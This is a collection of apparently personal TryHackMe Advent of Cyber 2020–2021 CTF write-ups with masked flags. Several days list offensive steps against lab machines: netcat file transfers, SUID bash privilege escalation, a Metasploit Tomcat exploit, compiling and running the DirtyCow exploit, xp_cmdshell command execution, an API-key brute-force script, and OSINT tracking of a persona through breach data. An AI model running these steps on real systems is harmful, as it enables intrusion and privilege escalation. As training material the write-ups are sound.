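# TO-DO: Automate transfer of backups to backup server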
13 |
14 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/shoppinglist.txt:
--------------------------------------------------------------------------------
1 | The Polar Express Movie
2 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-10-Dont-be-sElfish/README.md:
--------------------------------------------------------------------------------
1 | # Don't be sElfish!
2 |
3 | Before we begin, we're going to need to deploy two Instances:
4 |
5 | 1. The THM AttackBox by pressing the "Start AttackBox" button at the top-right of the page.
6 | 2. The vulnerable Instance attached to this task by pressing the "Deploy" button at the top-right of this task/day.
7 |
8 | - Using enum4linux, how many users are there on the Samba server?
9 |
10 | - `enum4linux -a `
11 | - `3`
12 |
13 | - Now how many "shares" are there on the Samba server?
14 |
15 | - `4`
16 |
17 | - Use smbclient to try to login to the shares on the Samba server (10.10.151.244). What share doesn't require a password?
18 |
19 | - `smbclient ///`
20 | - `tbfc-santa`
21 |
22 | - Log in to this share, what directory did ElfMcSkidy leave for Santa?
23 |
24 | - `jingle-tunes`
25 |
26 |
27 |
28 | ### see you ...
29 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-10-Dont-be-sElfish/note_from_mcskidy.txt:
--------------------------------------------------------------------------------
1 | Hi Santa, I decided to put all of your favourite jingles onto this share - allowing you access it from anywhere you like! Regards ~ ElfMcSkidy
2 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-11-The_Rogue_Gnome/README.md:
--------------------------------------------------------------------------------
1 | # The Rogue Gnome
2 |
3 | Before we begin, we're going to need to deploy two Instances:
4 |
5 | 1. The THM AttackBox by pressing the "Start AttackBox" button at the top-right of the page.
6 | 2. The vulnerable Instance attached to this task by pressing the "Deploy" button at the top-right of this task/day.
7 |
8 | - What type of privilege escalation involves using a user account to execute commands as an administrator?
9 |
10 | - `vertical`
11 |
12 | - What is the name of the file that contains a list of users who are a part of the sudo group?
13 |
14 |
15 | - `sudoers`
16 |
17 | - Use SSH to log in to the vulnerable machine like so: ssh cmnatic@MACHINE_IP
18 | Input the following password when prompted: aoc2020
19 |
20 | no answer needed
21 |
22 | - Enumerate the machine for executables that have had the SUID permission set. Look at the output and use a mixture of GTFObins and your researching skills to learn how to exploit this binary.
23 | You may find uploading some of the enumeration scripts that were used during today's task to be useful.
24 |
25 | no answer needed
26 |
27 | - On your machine `wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh`
28 | - `nc -lvnp 4444 < LinEnum.sh`
29 | - On target `nc -w 3 4444 > LinEnum.sh`
30 | - On target `chmod +x LinEnum.sh && ./LinEnum.sh`
31 | - We can see that `/bin/bash` has the SUID bit set. Good.
32 | - This could be done also with `find / -perm -u=s -type f 2>/dev/null`
33 | - On target `bash -p`
34 | - `cat /root/flag.txt`
35 |
36 | - Use this executable to launch a system shell as root.
37 | What are the contents of the file located at /root/flag.txt?
38 |
39 | - `thm{*****************}`
40 |
41 |
42 |
43 |
44 |
45 | ## see you ...
46 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-12-Ready,_set,_elf./README.md:
--------------------------------------------------------------------------------
1 | # Ready, set, elf.
2 |
3 |
4 | - What is the version number of the web server?
5 |
6 | - `nmap -sV ` (Remember, if it says "host seems down", use `-Pn` and look up what it means)
7 | - `9.0.17`
8 |
9 | - What CVE can be used to create a Meterpreter entry onto the machine? (Format: CVE-XXXX-XXXX)
10 |
11 | - `msfconsole`
12 | - `search tomcat 9`
13 | - It outputs `exploit/windows/http/tomcat_cgi_cmdlineargs 2019-04-10`. Googling that module name then gives the CVE:
14 | - `CVE-2019-0232`
15 |
16 | - Set your Metasploit settings appropriately and gain a foothold onto the deployed machine.
17 |
18 | no answer needed
19 |
20 | - After the search, it should output only one exploit; use `use 0` if there is a single result, or the appropriate number otherwise.
21 | - `set RHOSTS `
22 | - `set RPORT 8080`
23 | - `set LHOST `
24 | - `set targeturi /cgi-bin/elfwhacker.bat`
25 | - `run` or `exploit`
26 |
27 | - What are the contents of flag1.txt?
28 |
29 | - `cat flag1.txt`
30 | - `thm{********_***_***_*****}`
31 |
32 | - Looking for a challenge? Try to find out some of the vulnerabilities present to escalate your privileges!
33 |
34 | no answer needed
35 |
36 |
37 |
38 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-13-Coal_for_Christmas/README.md:
--------------------------------------------------------------------------------
1 | # Coal for Christmas
2 |
3 | - Hi Santa, hop in your sleigh and deploy this machine!
4 |
5 | no answer needed
6 |
7 | - nmap
8 |
9 | no answer needed
10 |
11 | - `nmap `
12 |
13 | - What old, deprecated protocol and service is running?
14 |
15 | - `telnet`
16 |
17 | - What credential was left for you?
18 |
19 | - `telnet 23`
20 | - `clauschristmas`
21 |
22 | - What distribution of Linux and version number is this server running?
23 |
24 | - `uname -a`
25 | - `Ubuntu 12.04`
26 |
27 | - Who got here first?
28 |
29 | - `cat cookies_and_milk.txt`
30 | - `grinch`
31 |
32 | - This cookies_and_milk.txt file looks like a modified rendition of a DirtyCow exploit, usually written in C. Find a copy of that original file online, and get it on the target box. You can do this with some simple file transfer methods like netcat, or spinning up a quick Python HTTP server... or you can simply copy-and-paste it into a text editor on the box!
33 |
34 | no answer needed
35 |
36 | - [dirtycow](https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c)
37 | - On your machine `nc -lnvp 4444 < dirty.c`
38 | - On target `nc -w 3 4444 > dirty.c`
39 |
40 | - What is the verbatim syntax you can use to compile, taken from the real C source code comments?
41 |
42 | - `gcc -pthread dirty.c -o dirty -lcrypt`
43 |
44 | - Run the commands to compile the exploit, and run it.
45 | What "new" username was created, with the default operations of the real C source code?
46 |
47 | - `./dirty` and then enter the password you've chosen
48 | - `firefart`
49 |
50 | - What is the MD5 hash output?
51 |
52 | - `cat message_from_the_grinch.txt`
53 | - `touch coal`
54 | - `tree | md5sum`
55 | - `********************************`
56 |
57 |
58 |
59 |
60 | ### see you ...
61 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-14-Where's Rudolph?/README.md:
--------------------------------------------------------------------------------
1 | # Where's Rudolph?
2 |
3 | - What URL will take me directly to Rudolph's Reddit comment history?
4 |
5 | - Google is your best friend. `https://www.reddit.com/user/IGuidetheClaus2020/comments/`
6 |
7 | - According to Rudolph, where was he born?
8 |
9 | - `Chicago`
10 |
11 | - Rudolph mentions Robert. Can you use Google to tell me Robert's last name?
12 |
13 | - Google is your friend.. `May`
14 |
15 | - On what other social media platform might Rudolph have an account?
16 |
17 | - Twitter Search
18 | - `https://twitter.com/IGuideClaus2020`
19 | - `twitter`
20 |
21 | - What is Rudolph's username on that platform?
22 |
23 | - `IGuideClaus2020`
24 |
25 | - What appears to be Rudolph's favorite TV show right now?
26 |
27 | - `bachelorette`, from his Twitter feed.
28 |
29 | - Based on Rudolph's post history, he took part in a parade. Where did the parade take place?
30 |
31 | - `Chicago`
32 |
33 | - Okay, you found the city, but where specifically was one of the photos taken?
34 |
35 | - [photo with higher resolution](https://twitter.com/IGuideClaus2020/status/1331615839318138883)
36 | - Upload on [exif.regex.info](http://exif.regex.info)
37 | - `41.891815, -87.624277`
38 |
39 | - Did you find a flag too?
40 |
41 | - `{FLAG}**********************`
42 |
43 | - Has Rudolph been pwned? What password of his appeared in a breach?
44 |
45 | - [Scylla Search](https://scylla.sh/api)
46 | - The email shown on Twitter is `rudolphthered@hotmail.com`.
47 | - `*******`
48 |
49 | - Based on all the information gathered. It's likely that Rudolph is in the Windy City and is staying in a hotel on Magnificent Mile. What are the street numbers of the hotel address?
50 |
51 | - `41.891815, -87.624277` on Google Maps
52 | - `Chicago Marriott Downtown` on Google Search
53 | - `540`
54 |
55 |
56 |
57 |
58 | ### see you ...
59 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-14-Where's Rudolph?/twitter.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-14-Where's Rudolph?/twitter.jpeg
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-14-Where's Rudolph?/twitterHR.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-14-Where's Rudolph?/twitterHR.jpeg
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-15-There's a Python in my stocking!/README.md:
--------------------------------------------------------------------------------
1 | # There's a Python in my stocking!
2 |
3 | - What's the output of True + True?
4 |
5 | - `2`
6 |
7 | - What's the database for installing other peoples libraries called?
8 |
9 | - `PyPi`
10 |
11 | - What is the output of bool("False")?
12 |
13 | - `True`
14 |
15 | - What library lets us download the HTML of a webpage?
16 |
17 | - `requests`
18 |
19 | - What is the output of the program provided in "Code to analyse for Question 5" in today's material?
20 | (This code is located above the Christmas banner and below the links in the main body of this task)
21 |
22 | - `[1, 2, 3, 6]`
23 |
24 | - What causes the previous task to output that?
25 |
26 | - `pass by reference`
27 |
28 |
29 |
30 |
31 | ### see you ...
32 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-16-Help! Where is Santa?/README.md:
--------------------------------------------------------------------------------
1 | # Help! Where is Santa?
2 |
3 | Oh no! Santa 🎅 has taken off, leaving you -- the faithful elves behind! Can you help find Santa's location?
4 |
5 | Santa has a webpage at `/static/index.html`
6 |
7 | - What is the port number for the web server?
8 |
9 | - `nmap -p -10000 `
10 | - `8000`
11 |
12 | - What is the directory for the API, without the API key?
13 |
14 | - Visit `http://:8000/` and inspect the page source.
15 | - `/api/`
16 |
17 | - Where is Santa right now?
18 |
19 | - Change the `TARGET_API` in `api_fuzzer.py`
20 | - `python3 api_fuzzer.py`
21 | - `Winter Wonderland, Hyde Park, London`
22 |
23 | - Find out the correct API key. Remember, this is an odd number between 0-100. After too many attempts, Santa's Sled will block you.
24 | To unblock yourself, simply terminate and re-deploy the target instance ()
25 |
26 | - `57`
27 |
28 |
29 |
30 |
31 | ### see you ...
32 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-16-Help! Where is Santa?/api_fuzzer.py:
--------------------------------------------------------------------------------
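import requests

# Host/IP of the target web server; the README says to replace this before running.
TARGET_API = "HERE YOUR TARGET_IP"

# Seconds to wait per request so a dropped connection (e.g. once the server
# starts blocking, as the README warns) fails instead of hanging the loop forever.
TIMEOUT = 5

# The README states the API key is an odd number between 0 and 100, so only
# odd values are tried. Each response's status code and body are printed.
for i in range(1, 100, 2):
    response = requests.get(
        "http://{}:8000/api/{}".format(TARGET_API, i),
        timeout=TIMEOUT,
    )
    print(str(i) + " : " + str(response.status_code))
    print(response.text)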
10 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-17-ReverseELFneering/README.md:
--------------------------------------------------------------------------------
1 | # ReverseELFneering
2 |
3 | Username: elfmceager
4 |
5 | Password: adventofcyber
6 |
7 | Use your new-found knowledge of Radare2 to analyse the "challenge1" file in the Instance that is attached to this task to answer the questions below.
8 |
9 | Connect by ssh to the target.
10 |
11 | - ssh elfmceager@, type `yes` and enter the password `adventofcyber`.
12 |
13 | - What is the value of local_ch when its corresponding movl instruction is called (first if multiple)?
14 |
15 | - `./file1`
16 | - `r2 -d ./file1`
17 | - Inside r2> `aa`
18 | - `afl | grep main`
19 | - `pdf @main`
20 | - `1`
21 |
22 | - What is the value of eax when the imull instruction is called?
23 |
24 | - `db 0x00400b55`
25 | - `pdf @main`
26 | - `dc`
27 | - `px @rbp-0xc`
28 | - `ds`
29 | - `px @rbp-0xc`
30 | - `dr`
31 | - `ds`
32 | - `dr`
33 | - `6`
34 |
35 | - What is the value of local_4h before eax is set to 0?
36 |
37 | - Play with breakpoints and registers
38 | - `6`
39 |
40 |
41 |
42 |
43 | ### see you ...
44 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-17-ReverseELFneering/r2_cs.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-17-ReverseELFneering/r2_cs.pdf
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-18-The_Bits_of_Christmas/README.md:
--------------------------------------------------------------------------------
1 | # The Bits of Christmas
2 |
3 |
4 | Username: `cmnatic`
5 |
6 | Password: `Adventofcyber!`
7 |
8 |
9 | - Open the "TBFC_APP" application in ILspy and begin decompiling the code
10 |
11 | - Open `Remmina` on your machine or install it with `sudo apt install remmina`
12 | - Start Remmina, enter the IP, the username and password.
13 | - Open ILSpy, click `File` and open `TBFC_APP`
14 |
15 | - What is Santa's password?
16 |
17 | - In the root folder we see there are a lot of contents: functions, libraries, main. Then we find a folder called `CrackMe`. Inside that folder there is the Main form code. If you analyze the code, you see that when the `Sumbit password` button is pressed it calls the function `buttonActivate_Click`... mmmh. Let's take a look.
18 | - The first function called is reference to a Module that include this `internal static $ArrayType$$$BY0BB@$$CBD ??_C@_0BB@IKKDFEPG@****************@/* Not supported: data(** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **) */;`. :)
19 | - `*************`
20 |
21 | - Now that you've retrieved this password, try to login...What is the flag?
22 |
23 | - `***{*****}`
24 |
25 |
26 |
27 |
28 | ### see you ...
29 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-19-The_Naughty_or_Nice_List/list.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-19-The_Naughty_or_Nice_List/list.png
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-20-PowershELlF_to_the_rescue/README.md:
--------------------------------------------------------------------------------
1 | # PowershELlF to the rescue
2 |
3 | - Search for the first hidden elf file within the Documents folder. Read the contents of this file. What does Elf 1 want?
4 |
5 | - `ssh -l mceager `
6 | - Enter the password `r0ckStar!`
7 | - `powershell` and wait until you see a new terminal
8 | - `Set-Location ./Documents/`
9 | - `Get-ChildItem -File`
10 | - `Get-ChildItem -File -Hidden`
11 | - Notice there is a hidden file `e1fone.txt` and a visible `elfone.txt`.
12 | - `Get-Content elfone.txt`
13 | - `Get-Content e1fone.txt`
14 | - `2 front teeth`
15 |
16 | - Search on the desktop for a hidden folder that contains the file for Elf 2. Read the contents of this file. What is the name of that movie that Elf 2 wants?
17 | - `cd ..`
18 | - `Set-Location Desktop`
19 | - `Get-ChildItem -Directory -Hidden`
20 | - `Set-Location .\elf2wo\`
21 | - `Get-Content .\e70smsW10Y4k.txt`
22 | - `Scrooged`
23 |
24 | - Search the Windows directory for a hidden folder that contains files for Elf 3. What is the name of the hidden folder? (This command will take a while)
25 |
26 | - `Set-Location C:\Windows`
27 | - `Get-ChildItem -Filter "*3*" -Recurse -Directory -Hidden -ErrorAction SilentlyContinue`
28 | - `Set-Location .\System32\3lfthr3e\`
29 | - `3lfthr3e`
30 |
31 | - How many words does the first file contain?
32 |
33 | - `Get-Content 1.txt | Measure-Object -Word`
34 | - `9999`
35 |
36 | - What 2 words are at index 551 and 6991 in the first file?
37 |
38 | - `(Get-Content .\1.txt)[551]`
39 | - `(Get-Content .\1.txt)[6991]` or `Get-Content 1.txt | Select-Object -Index 551,6991`
40 | - `Red Ryder`
41 |
42 | - This is only half the answer. Search in the 2nd file for the phrase from the previous question to get the full answer. What does Elf 3 want? (use spaces when submitting the answer)
43 |
44 | - `Get-Content 2.txt | Select-String -Pattern "redryder"`
45 | - `Red Ryder bb gun`
46 |
47 |
48 |
49 |
50 | ### see you ...
51 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-21-Time_for_some_ELForensics/README.md:
--------------------------------------------------------------------------------
1 | # Time for some ELForensics
2 |
3 | User name: `littlehelper`
4 | User password: `iLove5now!`
5 |
6 | Open Remmina and connect yourself to the remote machine.
7 |
8 | - Read the contents of the text file within the Documents folder. What is the file hash for db.exe?
9 |
10 | - Open PowerShell in remote machine
11 | - `Set-Location Documents`
12 | - `Get-ChildItem`
13 | - `Get-Content '.\db file hash.txt'`
14 | - `********************856E6A78E3A1`
15 |
16 | - What is the file hash of the mysterious executable within the Documents folder?
17 |
18 | - `Get-FileHash -Algorithm MD5 deebee.exe`
19 | - `********************6EB12AED09F0`
20 |
21 | - Using Strings find the hidden flag within the executable?
22 |
23 | - `C:\Tools\strings64.exe -accepteula deebee.exe`
24 | - Read the output carefully
25 | - `THM{*******************************}`
26 |
27 | - What is the flag that is displayed when you run the database connector file?
28 |
29 | - `Get-Item -Path .\deebee.exe -Stream *`
30 | - `wmic process call create $(Resolve-Path .\deebee.exe:hidedb)`
31 | - `THM{*******************************}`
32 |
33 |
34 |
35 | ### see you ...
36 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-23-The_Grinch_strikes_again!/README.md:
--------------------------------------------------------------------------------
1 | # The Grinch strikes again!
2 |
3 | 
4 |
5 | Use Remmina to connect to the target machine as described on the [room page](https://tryhackme.com/room/adventofcyber2).
6 |
7 | - User name: `administrator`
8 | - User password: `sn0wF!akes!!!`
9 |
10 |
11 | - Decrypt the fake 'bitcoin address' within the ransom note. What is the plain text value?
12 |
13 | - `echo -n "bm9tb3J************pdmFsY29tcGFueQ==" | base64 -d`
14 | - `nomore******************`
15 |
16 | - At times ransomware changes the file extensions of the encrypted files. What is the file extension for each of the encrypted files?
17 |
18 | - `.grinch`
19 |
20 | - What is the name of the suspicious scheduled task?
21 |
22 | - `opidsfsdf`
23 |
24 | - Inspect the properties of the scheduled task. What is the location of the executable that is run at login?
25 |
26 | - `C:\Users\Administrator\Desktop\oidsfsdf.exe`
27 |
28 | - There is another scheduled task that is related to VSS. What is the ShadowCopyVolume ID?
29 |
30 | - `7a9eea15-000-0000-0000-010000000000`
31 |
32 | - Assign the hidden partition a letter. What is the name of the hidden folder?
33 |
34 | - `confidential`
35 |
36 | - Right-click and inspect the properties for the hidden folder. Use the 'Previous Versions' tab to restore the encrypted file that is within this hidden folder to the previous version. What is the password within the file?
37 |
38 | - `*********************`
39 |
40 |
41 |
42 | # see you ...
43 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-23-The_Grinch_strikes_again!/win-ransomware.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-23-The_Grinch_strikes_again!/win-ransomware.png
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/README.md:
--------------------------------------------------------------------------------
1 | # Advent of Cyber 2020 🎄🎅
2 |
3 | ## [tryhackme.com/edoardottt](https://tryhackme.com/p/edoardottt)
4 |
5 | 
6 |
7 | These are all the things I have produced during my Advent of Cyber 2020. I hope you have as much fun as I had completing this AoC.
8 |
9 | Please, before emailing me, be sure you've read the whole introduction above the questions; it really is a good source for learning new things.
10 |
11 | 
12 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/advent.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/advent.png
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/thm-certificate.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/thm-certificate.png
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-01-Save_The_Gifts/README.md:
--------------------------------------------------------------------------------
1 | # Day 1 - Save the gifts
2 |
3 | The trick is to change the user id until you find the correct one.
4 |
5 | - After finding Santa's account, what is their position in the company?
6 |
7 | - `*********`
8 |
9 | - After finding McStocker's account, what is their position in the company?
10 |
11 | - `*************`
12 |
13 | - After finding the account responsible for tampering, what is their position in the company?
14 |
15 | - `***************`
16 |
17 | - What is the received flag when McSkidy fixes the Inventory Management System?
18 |
19 | - `THM{*****************}`
20 |
21 | - If you want to learn more about IDOR vulnerabilities, we suggest trying out this room https://tryhackme.com/room/idor
22 |
23 | No answer needed
24 |
25 | - Tasks released each day get progressively harder (but are still guided with walkthrough videos). Come back tomorrow for Day 2's task!
26 |
27 | No answer needed
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-02-Elf_HR_Problems/README.md:
--------------------------------------------------------------------------------
1 | # Day 2 Elf HR Problems
2 |
3 | - Open the static site in a new tab, here.
4 |
5 | no answer needed
6 |
7 | - Register an account, and verify the cookies using the Developer Tools in your browser.
8 |
9 | - What is the name of the new cookie that was created for your account?
10 |
11 | - Open the developer tools with F12, go to the Application tab, and look under Cookies.
12 | - `*********`
13 |
14 | - What encoding type was used for the cookie value?
15 |
16 | - Go to [CyberChef](https://gchq.github.io/CyberChef/), insert the cookie value as input and use the Magic operation as the recipe.
17 | - `***********`
18 |
19 |
20 | - What object format is the data of the cookie stored in?
21 |
22 | - `***n`
23 |
24 | - Manipulate the cookie and bypass the login portal.
25 |
26 | - What is the value of the administrator cookie? (username = admin)
27 |
28 | - Go back to CyberChef and do the inverse: change the username from yours to 'admin' and apply "To Hex".
29 | - `******************...***************`
30 |
31 | - What team environment is not responding?
32 |
33 | - `**`
34 |
35 | - What team environment has a network warning?
36 |
37 | - `**********`
38 |
39 | - If you want to learn more about Authentication bypasses, we suggest trying out this room https://tryhackme.com/jr/authenticationbypass
40 |
41 | No answer needed
42 |
43 | Tasks released each day get progressively harder (but are still guided with walkthrough videos). Come back tomorrow for Day 3's task, where InsiderPHD will be recording a video walkthrough!
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-03-Christmas_Blackout/README.md:
--------------------------------------------------------------------------------
1 | # Day 3 - Christmas Blackout
2 |
3 |
4 | - Using a common wordlist for discovering content, enumerate http://MACHINE_IP to find the location of the administrator dashboard. What is the name of the folder?
5 |
6 | - `*****`
7 |
8 |
9 | - In your web browser, try some default credentials on the newly discovered login form for the "administrator" user. What is the password?
10 |
11 | - `***************`
12 |
13 |
14 | - Access the admin panel. What is the value of the flag?
15 |
16 | - `********************`
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-04-Santas_Running_Behind/README.md:
--------------------------------------------------------------------------------
1 | # Day 4 - Santa's Running Behind
2 |
3 |
4 |
5 | - Access the login form at http://MACHINE_IP
6 |
7 | No answer needed
8 |
9 | - Configure Burp Suite & Firefox, submit some dummy credentials and intercept the request. Use intruder to attack the login form.
10 |
11 | No answer needed
12 |
13 | What valid password can you use to access the "santa" account?
14 |
15 | - `******`
16 |
17 | - What is the flag in Santa's itinerary?
18 |
19 | - `***************`
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-05-Pesky_Elf_Forum/README.md:
--------------------------------------------------------------------------------
1 | # Day 5 - Pesky Elf Forum
2 |
3 |
4 | - What flag did you get when you disabled the plugin?
5 |
6 | - `*****************`
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-06-Patch_Management_Is_Hard/README.md:
--------------------------------------------------------------------------------
1 | # Day 6 - Patch Management Is Hard
2 |
3 | - Deploy the attached VM and look around. What is the entry point for our web application?
4 |
5 | - `err`
6 |
7 | - Use the entry point to perform LFI to read the /etc/flag file. What is the flag?
8 |
9 | - `***************************`
10 |
11 | - Use the PHP filter technique to read the source code of the index.php. What is the $flag variable's value?
12 |
13 | - `***************************`
14 |
15 | McSkidy forgot his login credential. Can you help him to login in order to recover one of the server's passwords?
16 | Now that you read the index.php, there is a login credential PHP file's path. Use the PHP filter technique to read its content. What are the username and password?
17 |
18 | - `MCSkidy:**********`
19 |
20 | - Use the credentials to login into the web application. Help McSkidy to recover the server's password. What is the password of the flag.thm.aoc server?
21 |
22 | - `**************************`
23 |
24 | - The web application logs all users' requests, and only authorized users can read the log file. Use the LFI to gain RCE via the log file page. What is the hostname of the webserver? The log file location is at ./includes/logs/app_access.log.
25 |
26 | - `**************************************`
27 |
28 | - Bonus: The current PHP configuration stores the PHP session files in /tmp. Use the LFI to call the PHP session file to get your PHP code executed.
29 |
30 | No answer needed
31 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-07-Migration_Without_Security/README.md:
--------------------------------------------------------------------------------
1 | # Day 7 - Migration Without Security
2 |
3 | - Interact with the MongoDB server to find the flag. What is the flag?
4 |
5 | - `***{********************************}`
6 |
7 | We discussed how to bypass login pages as an admin. Can you log into the application that Grinch Enterprise controls as admin and retrieve the flag?
8 |
9 | Use the knowledge given in AoC3 day 4 to setup and run Burp Suite proxy to intercept the HTTP request for the login page. Then modify the POST parameter.
10 |
11 | - `***{********************************}`
12 |
13 | - Once you are logged in, use the gift search page to list all usernames that have guest roles. What is the flag?
14 |
15 | - `***{********************************}`
16 |
17 | - Use the gift search page to perform NoSQL injection and retrieve the mcskidy record. What is the details record?
18 |
19 | - `*************************************`
20 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-09-Where_Is_All_This_Data_Going/AoC3.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2021/Day-09-Where_Is_All_This_Data_Going/AoC3.pcap
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-09-Where_Is_All_This_Data_Going/README.md:
--------------------------------------------------------------------------------
1 | # Day 9 - Where Is All This Data Going
2 |
3 | - In the HTTP #1 - GET requests section, which directory is found on the web server?
4 |
5 | - `*****`
6 |
7 | - What is the username and password used in the login page in the HTTP #2 - POST section?
8 |
9 | - `*******************`
10 |
11 | - What is the User-Agent's name that has been sent in HTTP #2 - POST section?
12 |
13 | - `***************************************`
14 |
15 | - In the DNS section, there is a TXT DNS query. What is the flag in the message of that DNS query?
16 |
17 | - `*******************************`
18 |
19 | - In the FTP section, what is the FTP login password?
20 |
21 | - `**********`
22 |
23 | - In the FTP section, what is the FTP command used to upload the secret.txt file?
24 |
25 | - `****`
26 |
27 | - In the FTP section, what is the content of the secret.txt file?
28 |
29 | - `*********`
30 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-10-Offensive_Is_The_Best_Defence/README.md:
--------------------------------------------------------------------------------
1 | # Day 10 - Offensive Is The Best Defence
2 |
3 | - Help McSkidy and run nmap -sT MACHINE_IP. How many ports are open between 1 and 100?
4 |
5 | - `*`
6 |
7 | - What is the smallest port number that is open?
8 |
9 | - `**`
10 |
11 | - What is the service related to the highest port number you found in the first question?
12 |
13 | - `****`
14 |
15 | - Now run nmap -sS MACHINE_IP. Did you get the same results? (Y/N)
16 |
17 | - `*`
18 |
19 | - If you want Nmap to detect the version info of the services installed, you can use nmap -sV MACHINE_IP. What is the version number of the web server?
20 |
21 | - `*****************`
22 |
23 | - By checking the vulnerabilities related to the installed web server, you learn that there is a critical vulnerability that allows path traversal and remote code execution. Now you can tell McSkidy that Grinch Enterprises used this vulnerability. What is the CVE number of the vulnerability that was solved in version 2.4.51?
24 |
25 | - `**************`
26 |
27 | - You are putting the pieces together and have a good idea of how your web server was exploited. McSkidy is suspicious that the attacker might have installed a backdoor. She asks you to check if there is some service listening on an uncommon port, i.e. outside the 1000 common ports that Nmap scans by default. She explains that adding -p1-65535 or -p- will scan all 65,535 TCP ports instead of only scanning the 1000 most common ports. What is the port number that appeared in the results now?
28 |
29 | - `*****`
30 |
31 | - What is the name of the program listening on the newly discovered port?
32 |
33 | - `*******`
34 |
35 | If you would like to learn more about the topics covered in today’s tasks, we recommend checking out the Network Security module.
36 |
37 | No answer needed
38 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-11-Where_Are_The_Reindeers/README.md:
--------------------------------------------------------------------------------
1 | # Day 11 - Where Are The Reindeers?
2 |
3 | - There is an open port related to MS SQL Server accessible over the network. What is the port number?
4 |
5 | - `nmap -Pn `
6 | - `****`
7 |
8 | - If the connection is successful, you will get a prompt. What is the prompt that you have received?
9 |
10 | - `sqsh -S -U sa -P t7uLKzddQzVjVFJp`
11 | - `**`
12 |
13 | - We can see four columns in the table displayed above: id, first (name), last (name), and nickname. What is the first name of the reindeer of id 9?
14 |
15 | - `*******`
16 |
17 | - Check the table schedule. What is the destination of the trip scheduled on December 7?
18 |
19 | - `select * from reindeer.dbo.schedule;`
20 | - `******`
21 |
22 | - Check the table presents. What is the quantity available for the present “Power Bank”?
23 |
24 | - `select * from reindeer.dbo.presents;`
25 | - `*****`
26 |
27 | - There is a flag hidden in the grinch user's home directory. What are its contents?
28 |
29 | - `xp_cmdshell 'dir C:\Users\grinch';`
30 | - `xp_cmdshell 'dir C:\Users\grinch\Documents';`
31 | - `xp_cmdshell 'type C:\Users\grinch\Documents\flag.txt';`
32 | - `***************`
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-12-Sharing_Without_Caring/README.md:
--------------------------------------------------------------------------------
1 | # Day 12 - Sharing Without Caring
2 |
3 | - Scan the target server with the IP 10.10.112.197. Remember that MS Windows hosts block pings by default, so we need to add -Pn, for example, nmap -Pn 10.10.112.197 for the scan to work correctly. How many TCP ports are open?
4 |
5 | - `*`
6 |
7 | - In the scan results you received earlier, you should be able to spot NFS or mountd, depending on whether you used the -sV option with Nmap or not. Which port is detected by Nmap as NFS or using the mountd service?
8 |
9 | - `****`
10 |
11 | - How many shares did you find?
12 |
13 | - `*`
14 |
15 | - How many shares show “everyone”?
16 |
17 | - `*`
18 |
19 | - What is the title of file 2680-0.txt?
20 |
21 | - `***********`
22 |
